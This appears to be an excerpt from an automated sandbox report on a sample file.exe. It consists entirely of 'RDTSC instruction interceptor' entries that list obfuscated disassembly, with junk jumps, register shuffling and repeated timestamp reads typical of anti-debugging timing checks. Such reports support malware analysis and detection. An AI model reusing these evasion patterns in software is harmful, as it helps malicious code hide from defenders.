                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B03E9 second address: 53B044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F84B0D655FCh 0x00000011 pushad 0x00000012 mov esi, 50DB28E7h 0x00000017 movzx ecx, di 0x0000001a popad 0x0000001b popad 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F84B0D65605h 0x00000024 adc ecx, 7419A006h 0x0000002a jmp 00007F84B0D65601h 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0300 second address: 53C0345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 3E8Ah 0x00000007 pushfd 0x00000008 jmp 00007F84B0B050DBh 0x0000000d sbb ax, 9D2Eh 0x00000012 jmp 00007F84B0B050E9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F84B0B050DDh 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D033C second address: 53D0342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0342 second address: 53D03AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F84B0B050DBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F84B0B050E6h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F84B0B050DDh 0x00000020 sbb ah, 00000026h 0x00000023 jmp 00007F84B0B050E1h 0x00000028 popfd 0x00000029 jmp 00007F84B0B050E0h 0x0000002e popad 0x0000002f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B055C second address: 53B0561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0561 second address: 53B0590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 jmp 00007F84B0B050E1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F84B0B050DEh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0590 second address: 53B0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0594 second address: 53B059A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B059A second address: 53B05C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e mov ch, dh 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F84B0D655FFh 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B05C8 second address: 53B05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B05E0 second address: 53B05F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F84B0D655FAh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B05F5 second address: 53B05FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0EEB second address: 53C0F49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 75BE8AA3h 0x00000010 jmp 00007F84B0D65608h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movzx ecx, dx 0x0000001d jmp 00007F84B0D65609h 0x00000022 popad 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0F49 second address: 53C0F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F84B0B050E5h 0x00000010 mov ebp, esp 0x00000012 jmp 00007F84B0B050DEh 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0F80 second address: 53C0F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0F84 second address: 53C0FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0180 second address: 53D0212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 mov edi, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e mov esi, 5EC18A5Dh 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 mov ax, dx 0x0000001a pushfd 0x0000001b jmp 00007F84B0D655FBh 0x00000020 or ax, 23CEh 0x00000025 jmp 00007F84B0D65609h 0x0000002a popfd 0x0000002b popad 0x0000002c call 00007F84B0D65600h 0x00000031 mov si, 72E1h 0x00000035 pop esi 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushfd 0x0000003c jmp 00007F84B0D65609h 0x00000041 sub eax, 6C36A166h 0x00000047 jmp 00007F84B0D65601h 0x0000004c popfd 0x0000004d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F06CC second address: 53F06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov bh, C5h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov bl, cl 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F06F7 second address: 53F07FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ecx 0x00000007 jmp 00007F84B0D65600h 0x0000000c push eax 0x0000000d jmp 00007F84B0D655FBh 0x00000012 xchg eax, ecx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F84B0D65604h 0x0000001a and si, 6BB8h 0x0000001f jmp 00007F84B0D655FBh 0x00000024 popfd 0x00000025 push ecx 0x00000026 pushfd 0x00000027 jmp 00007F84B0D655FFh 0x0000002c sub si, E57Eh 0x00000031 jmp 00007F84B0D65609h 0x00000036 popfd 0x00000037 pop esi 0x00000038 popad 0x00000039 mov eax, dword ptr [775F65FCh] 0x0000003e jmp 00007F84B0D65607h 0x00000043 test eax, eax 0x00000045 jmp 00007F84B0D65606h 0x0000004a je 00007F8522EE87B4h 0x00000050 jmp 00007F84B0D65600h 0x00000055 mov ecx, eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c pushfd 0x0000005d jmp 00007F84B0D65603h 0x00000062 or eax, 29A6C24Eh 0x00000068 jmp 00007F84B0D65609h 0x0000006d popfd 0x0000006e popad 0x0000006f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F07FA second address: 53F0800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0800 second address: 53F0804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0804 second address: 53F086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007F84B0B050E4h 0x00000010 and ecx, 1Fh 0x00000013 pushad 0x00000014 movzx eax, di 0x00000017 push ebx 0x00000018 pushfd 0x00000019 jmp 00007F84B0B050E6h 0x0000001e sbb ax, F458h 0x00000023 jmp 00007F84B0B050DBh 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b ror eax, cl 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F84B0B050E0h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F086C second address: 53F0871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0871 second address: 53F093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e jmp 00007F84B0B050E9h 0x00000013 popad 0x00000014 retn 0004h 0x00000017 nop 0x00000018 mov esi, eax 0x0000001a lea eax, dword ptr [ebp-08h] 0x0000001d xor esi, dword ptr [00072014h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push eax 0x00000026 lea eax, dword ptr [ebp-10h] 0x00000029 push eax 0x0000002a call 00007F84B5EC598Eh 0x0000002f push FFFFFFFEh 0x00000031 jmp 00007F84B0B050DEh 0x00000036 pop eax 0x00000037 jmp 00007F84B0B050E0h 0x0000003c ret 0x0000003d nop 0x0000003e push eax 0x0000003f call 00007F84B5EC59A9h 0x00000044 mov edi, edi 0x00000046 jmp 00007F84B0B050E0h 0x0000004b xchg eax, ebp 0x0000004c pushad 0x0000004d mov si, 136Dh 0x00000051 call 00007F84B0B050DAh 0x00000056 mov di, cx 0x00000059 pop ecx 0x0000005a popad 0x0000005b push eax 0x0000005c jmp 00007F84B0B050DCh 0x00000061 xchg eax, ebp 0x00000062 jmp 00007F84B0B050E0h 0x00000067 mov ebp, esp 0x00000069 jmp 00007F84B0B050E0h 0x0000006e pop ebp 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F84B0B050E7h 0x00000076 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F093B second address: 53F0941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0941 second address: 53F0945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0070 second address: 53A00A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F84B0D65603h 0x0000000a xor ecx, 3DB4BEAEh 0x00000010 jmp 00007F84B0D65609h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A00A9 second address: 53A0144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0B050E7h 0x00000009 add ch, FFFFFFBEh 0x0000000c jmp 00007F84B0B050E9h 0x00000011 popfd 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 and esp, FFFFFFF8h 0x0000001a pushad 0x0000001b push edi 0x0000001c call 00007F84B0B050E2h 0x00000021 pop esi 0x00000022 pop ebx 0x00000023 popad 0x00000024 xchg eax, ecx 0x00000025 jmp 00007F84B0B050DEh 0x0000002a push eax 0x0000002b pushad 0x0000002c mov edi, 0D8345C4h 0x00000031 push edx 0x00000032 mov dl, cl 0x00000034 pop ebx 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007F84B0B050E0h 0x0000003c xchg eax, ebx 0x0000003d jmp 00007F84B0B050E0h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0144 second address: 53A0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0148 second address: 53A014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A014C second address: 53A0152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0152 second address: 53A0158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0158 second address: 53A015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A015C second address: 53A018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F84B0B050DDh 0x0000000e mov ebx, dword ptr [ebp+10h] 0x00000011 jmp 00007F84B0B050DEh 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A018A second address: 53A018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A018E second address: 53A0194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0194 second address: 53A0199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0199 second address: 53A01CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F84B0B050DFh 0x00000014 jmp 00007F84B0B050E3h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01CD second address: 53A01D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01D2 second address: 53A0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 mov esi, dword ptr [ebp+08h] 0x00000015 jmp 00007F84B0B050E7h 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0205 second address: 53A0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0209 second address: 53A020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A020D second address: 53A0213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0213 second address: 53A02C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F84B0B050DBh 0x00000011 xchg eax, edi 0x00000012 jmp 00007F84B0B050E6h 0x00000017 test esi, esi 0x00000019 jmp 00007F84B0B050E0h 0x0000001e je 00007F8522CD3498h 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F84B0B050DEh 0x0000002b xor ax, BD78h 0x00000030 jmp 00007F84B0B050DBh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F84B0B050E8h 0x0000003c jmp 00007F84B0B050E5h 0x00000041 popfd 0x00000042 popad 0x00000043 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004a pushad 0x0000004b mov edi, esi 0x0000004d mov edx, eax 0x0000004f popad 0x00000050 je 00007F8522CD344Ah 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A02C2 second address: 53A0307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edx, dword ptr [esi+44h] 0x0000000d jmp 00007F84B0D65607h 0x00000012 or edx, dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F84B0D65605h 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390786 second address: 539078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539078C second address: 5390790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390790 second address: 53907D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F84B0B050E6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 movsx edi, si 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F84B0B050E2h 0x0000001e and esp, FFFFFFF8h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push edx 0x00000025 pop ecx 0x00000026 mov ecx, edx 0x00000028 popad 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53907D7 second address: 539083A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F84B0D65600h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dx, 2454h 0x00000015 mov edx, 1F5531C0h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F84B0D655FBh 0x00000025 sub eax, 484172EEh 0x0000002b jmp 00007F84B0D65609h 0x00000030 popfd 0x00000031 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539083A second address: 53908FC instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F84B0B050DDh 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push ecx 0x00000011 jmp 00007F84B0B050DAh 0x00000016 mov dword ptr [esp], esi 0x00000019 jmp 00007F84B0B050E0h 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 jmp 00007F84B0B050E0h 0x00000026 sub ebx, ebx 0x00000028 pushad 0x00000029 call 00007F84B0B050E7h 0x0000002e mov esi, 6EC8DC1Fh 0x00000033 pop esi 0x00000034 movsx edx, cx 0x00000037 popad 0x00000038 test esi, esi 0x0000003a pushad 0x0000003b call 00007F84B0B050DAh 0x00000040 pop edx 0x00000041 pushfd 0x00000042 jmp 00007F84B0B050DEh 0x00000047 sub ecx, 0C7A4CB8h 0x0000004d jmp 00007F84B0B050DBh 0x00000052 popfd 0x00000053 popad 0x00000054 je 00007F8522CDAB8Dh 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov si, dx 0x00000060 call 00007F84B0B050E7h 0x00000065 pop eax 0x00000066 popad 0x00000067 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53908FC second address: 5390902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390902 second address: 5390918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390918 second address: 539091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539091D second address: 5390923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390923 second address: 5390927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390927 second address: 53909BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007F84B0B050E6h 0x0000000f je 00007F8522CDAB32h 0x00000015 pushad 0x00000016 mov dl, cl 0x00000018 push edi 0x00000019 pushfd 0x0000001a jmp 00007F84B0B050E6h 0x0000001f adc ecx, 35E75638h 0x00000025 jmp 00007F84B0B050DBh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d test byte ptr [775F6968h], 00000002h 0x00000034 jmp 00007F84B0B050DFh 0x00000039 jne 00007F8522CDAAFAh 0x0000003f pushad 0x00000040 movzx esi, dx 0x00000043 mov ecx, ebx 0x00000045 popad 0x00000046 mov edx, dword ptr [ebp+0Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F84B0B050E6h 0x00000050 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53909BA second address: 53909CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0D655FEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53909CC second address: 53909D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53909D0 second address: 53909DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53909DF second address: 53909E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53909E5 second address: 5390A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F84B0D65605h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A09 second address: 5390A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A0F second address: 5390A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A13 second address: 5390A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F84B0B050E2h 0x00000015 xor si, 3948h 0x0000001a jmp 00007F84B0B050DBh 0x0000001f popfd 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A54 second address: 5390A74 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, di 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F84B0D655FEh 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A74 second address: 5390A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390A78 second address: 5390A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
